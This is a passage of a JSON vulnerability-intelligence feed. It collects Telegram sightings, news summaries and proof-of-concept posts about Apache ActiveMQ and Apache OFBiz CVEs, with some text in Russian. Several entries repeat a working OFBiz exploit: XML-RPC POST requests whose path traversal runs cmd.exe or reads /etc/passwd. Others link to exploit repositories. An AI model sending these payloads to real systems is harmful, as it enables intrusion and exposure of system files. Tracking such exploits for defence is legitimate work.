(Jolokia, JMX, \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u043a\u043e\u043d\u043d\u0435\u043a\u0442\u043e\u0440\u043e\u0432 \u0438 \u0442\u0440\u0430\u043d\u0441\u043f\u043e\u0440\u0442\u043d\u044b\u0445 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043c\u0430\u0448\u0438\u043d).\n\n\u041a\u0430\u0436\u0434\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u0432\u043e\u044e \u0437\u0430\u0434\u0430\u0447\u0443, \u043d\u043e \u0432\u043c\u0435\u0441\u0442\u0435 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0438 \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c. \u0418\u043c\u0435\u043d\u043d\u043e \u0437\u0434\u0435\u0441\u044c Claude \u043f\u0440\u043e\u044f\u0432\u0438\u043b \u0441\u0435\u0431\u044f \u0432\u043e \u0432\u0441\u0435\u0439 \u043a\u0440\u0430\u0441\u0435 - \u0443\u043c\u0435\u043b\u043e \u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0432 \u0432\u0441\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0432\u043e\u0435\u0434\u0438\u043d\u043e.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0441\u043e\u043e\u0431\u0449\u0438\u043b \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c Apache 22 \u043c\u0430\u0440\u0442\u0430, \u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u00a0\u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b \u0435\u0435 30 \u043c\u0430\u0440\u0442\u0430\u00a0\u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 ActiveMQ Classic 6.2.3 \u0438 5.19.4.\n\n\u0412 \u043e\u0442\u0447\u0435\u0442\u0435\u00a0Horizon3 \u043f\u043e\u044f\u0441\u043d\u044f\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e API \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Jolokia \u0432 ActiveMQ \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0431\u0440\u043e\u043a\u0435\u0440\u0430 (addNetworkConnector), \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439.\n\n\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0431\u0440\u043e\u043a\u0435\u0440\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 Spring XML-\u0444\u0430\u0439\u043b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0435\u0433\u043e \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438.\n\n\u0414\u043b\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u0447\u0435\u0440\u0435\u0437 Jolokia, \u043d\u043e \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0441 6.0.0 \u043f\u043e 6.1.1 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0439 \u0438\u0437-\u0437\u0430 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0439 CVE-2024-32114, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a API \u0431\u0435\u0437 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Horizon3 \u043f\u043e\u0434\u0447\u0435\u0440\u043a\u043d\u0443\u043b\u0438 \u0440\u0438\u0441\u043a, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u0443\u043a\u0430\u0437\u0430\u0432 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 ActiveMQ CVE, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u043c ActiveMQ, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043d\u043e \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043a\u0430\u043a \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u0434\u0430\u0447\u0443, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 ActiveMQ \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b\u0441\u044f \u0446\u0435\u043b\u044c\u044e \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u043c\u0435\u0442\u043e\u0434\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438 \u043f\u043e\u0441\u0442\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 ActiveMQ \u0445\u043e\u0440\u043e\u0448\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b.\n\nCVE-2026-34197 \u043f\u043e\u043a\u0430 \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f, \u043d\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b \u0432 \u0436\u0443\u0440\u043d\u0430\u043b\u0430\u0445 \u0431\u0440\u043e\u043a\u0435\u0440\u0430 ActiveMQ.\n\n\u041e\u043d\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0438\u0441\u043a\u0430\u0442\u044c \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0431\u0440\u043e\u043a\u0435\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 VM \u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 brokerConfig=xbean:http://.\n\n\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f. \u0415\u0441\u043b\u0438 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0441 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0433\u043e\u0432\u043e\u0440\u044f\u0442, \u0447\u0442\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0443\u0436\u0435 \u0431\u044b\u043b\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0430.", "creation_timestamp": "2026-04-09T17:20:06.000000Z"}, {"uuid": "810b3d63-2be7-402b-946e-f317a6ca44f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/TFgIrRyFVdmt-_iXx8f0LX8Ka84NvNMzkX0RvLq3uNFE64w", "content": "", "creation_timestamp": "2025-10-10T03:00:06.000000Z"}, {"uuid": "da7376d6-e9fe-4697-997d-349ea4163611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/u8Tk1Wc2POt9T15Mw3l9G1TvENAy6h4h4vyQZfJEp1FRhKw", "content": "", "creation_timestamp": "2025-07-11T09:00:04.000000Z"}, {"uuid": "74a214cb-f8fa-4ddd-add9-2292513dfb34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/cibsecurity/79555", "content": "\ud83e\udd85 The Re-Emergence of CVE-2024-32113: How CVE-2024-45195 has amplified Exploitation Risks \ud83e\udd85\n\n  Overview   On September 7, 2024, Cyble Global Sensor Intelligence CGSI identified the active exploitation of CVE202432113, a critical path traversal vulnerability in the Apache OFBiz opensource enterprise resource planning ERP system. This flaw was initially addressed on April 12, 2024, with a formal patch released on May 8, 2024. CVE202432113 allows Threat Actors TAs to execute arbitrary commands by sending specially crafted requests, enabling them to gain unauthorized access and execute arbitrary commands.   On September 4, 2024, the identification of CVE202445195 reignited concerns surrounding Apache OFBiz by revealing a bypass for several previously addressed vulnerabilities, notably CVE202432113. This development has intensified the exploitation of CVE202432113, as attackers expl...\n\n\ud83d\udcd6 Read more.\n\n\ud83d\udd17 Via \"CYBLE\"\n\n----------\n\ud83d\udc41\ufe0f Seen on @cibsecurity", "creation_timestamp": "2024-09-10T19:09:49.000000Z"}, {"uuid": "f32eae95-7b36-4f38-8459-7dfc18ec8928", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/203", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection\n\n\ud83d\udcda ZeroEthical Course \ud83d\udc8e", "creation_timestamp": "2024-05-24T03:20:53.000000Z"}, {"uuid": "4cb0eede-77b5-4f07-a05f-4600b654cf7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/AjZiAtjz3X9oVI9kkYa211a-RUOBTsuNgCrdLIAW4aPtRg", "content": "", "creation_timestamp": "2024-06-05T18:27:43.000000Z"}, {"uuid": "2f26eef2-24ad-4c15-a7df-0ae424429a4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/165", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  performCommand\n  \n    \n      ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n    \n  \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  example.createBlogPost\n  \n    \n      ../../../../../../etc/passwd\n    \n  \n\n\n\ud83d\udc68\u200d\ud83c\udfeb ZeroEthical Course\ud83d\udcda", "creation_timestamp": "2024-05-23T02:18:39.000000Z"}, {"uuid": "0d10895b-45e4-4553-8440-e17910f146e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://t.me/HackingInsights/8217", "content": "Increased Activity Against Apache OFBiz CVE-2024-32113, (Wed, Jul 31st)\nhttps://ift.tt/glFqA6d", "creation_timestamp": "2024-08-01T03:33:55.000000Z"}, {"uuid": "e6493a99-5663-4672-9082-b495d7ec5e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/CivilityBreaches/347", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  performCommand\n  \n    \n      ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n    \n  \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  example.createBlogPost\n  \n    \n      ../../../../../../etc/passwd\n    \n  \n", "creation_timestamp": "2024-05-21T12:02:35.000000Z"}, {"uuid": "98e9dc63-bd76-4d3f-b4d9-ec5628fc1598", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/227", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n\u00a0 performCommand\n\u00a0 \n\u00a0\u00a0\u00a0 \n\u00a0\u00a0\u00a0\u00a0\u00a0 ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n\u00a0\u00a0\u00a0 \n\u00a0 \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n\u00a0 example.createBlogPost\n\u00a0 \n\u00a0\u00a0\u00a0 \n\u00a0\u00a0\u00a0\u00a0\u00a0 ../../../../../../etc/passwd\n\u00a0\u00a0\u00a0 \n\u00a0 \n", "creation_timestamp": "2024-05-17T02:12:53.000000Z"}, {"uuid": "3422a1b6-8df6-429a-b251-92d0ef24b681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/372", "content": "\u200aCVE-2024-32113 \u2013 RCE Vulnerability in Apache OFBiz: Immediate Action Required\n\nhttps://securityonline.info/cve-2024-32113-rce-vulnerability-in-apache-ofbiz-immediate-action-required/", "creation_timestamp": "2024-05-13T14:19:09.000000Z"}, {"uuid": "f7424d30-d3b1-4f22-8c56-849eebb625ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/dzEU9L8PpKSQtkFqs1TKZKjscCL-BTrtkNkRArY-aBUeBw", "content": "", "creation_timestamp": "2024-06-05T16:08:29.000000Z"}, {"uuid": "897f1fea-527f-48e3-a516-4baf9dca5c7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2213", "content": "Apache OfBiz vulns \n*\n\u041f\u043e\u043b\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440: POC\u043e\u0432, RCE\u0451\u0432, CURL\u043e\u0432, Burp\u0441\u044c\u044e\u0442\u043e\u0432\n(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)\n*\n// lInK*/\n\n#apache", "creation_timestamp": "2024-08-06T16:34:23.000000Z"}, {"uuid": "65c69a2f-1478-4a94-bbf7-487f1819bb2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://t.me/HackingInsights/39", "content": "\u200aNew High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114\n\nhttps://malware.news/t/new-high-severity-vulnerability-in-apache-activemq-poses-risk-of-unauthorized-access-cve-2024-32114/81541", "creation_timestamp": "2024-05-04T14:36:16.000000Z"}, {"uuid": "d942289f-b355-4368-a613-2b2ad25cabf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "Telegram/A8vVtnjw2dY4soTK8z_RafcnQfUb2ia7BtuexHYzGM_Fj20", "content": "", "creation_timestamp": "2024-06-24T20:00:18.000000Z"}, {"uuid": "2e56beeb-f12c-45f4-93eb-71cd56fcd78f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2082", "content": "CVE-2024-32113 Apache-OFBiz\n*\nPOC \u0434\u043b\u044f WIN\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  performCommand\n  \n    \n      ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\\n    \n  \n\n\nPOC \u0434\u043b\u044f *NIX\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n  example.createBlogPost\n  \n    \n      ../../../../../../etc/passwd\n    \n  \n", "creation_timestamp": "2024-05-16T05:52:02.000000Z"}, {"uuid": "715b9401-a5e7-4ad1-ba9f-25831b83e6e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "exploited", "source": "https://t.me/true_secator/6056", "content": "\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0438 \u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u0438 Apache OFBiz \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 ERP (Enterprise Resource Planning).\n\nOFBiz, \u043f\u043e-\u0432\u0438\u0434\u0438\u043c\u043e\u043c\u0443, \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u043c\u0435\u043d\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d, \u0447\u0435\u043c \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438\u0435 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u044b, \u0442\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u044d\u0442\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c ERP \u0438\u043c\u0435\u0435\u0442 \u043a\u043b\u044e\u0447\u0435\u0432\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n\n\u0410\u0442\u0430\u043a\u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043c\u0430\u0435, \u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0439 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u0432\u0443\u0445 \u043c\u0435\u0441\u044f\u0446\u0435\u0432 \u0434\u043e \u043d\u0430\u0447\u0430\u043b\u0430 \u0430\u0442\u0430\u043a. \u0411\u044b\u043b\u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b \u0432\u0435\u0440\u0441\u0438\u0438 OFBiz \u0434\u043e 18.12.13.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-32113 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043e\u0431\u0445\u043e\u0434 \u043f\u0443\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0432 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 OFBiz.\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u0440\u0435\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u0443\u0442\u0435\u043c \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u043e\u0447\u043a\u0438 \u0441 \u0437\u0430\u043f\u044f\u0442\u043e\u0439 (;) \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e URL-\u0430\u0434\u0440\u0435\u0441\u0430, \u0430 \u0437\u0430\u0442\u0435\u043c \u0447\u0430\u0441\u0442\u043d\u043e\u0433\u043e URL-\u0430\u0434\u0440\u0435\u0441\u0430, \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0445\u043e\u0447\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 URL-\u0430\u0434\u0440\u0435\u0441\u0430, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SANS Internet Storm Center, 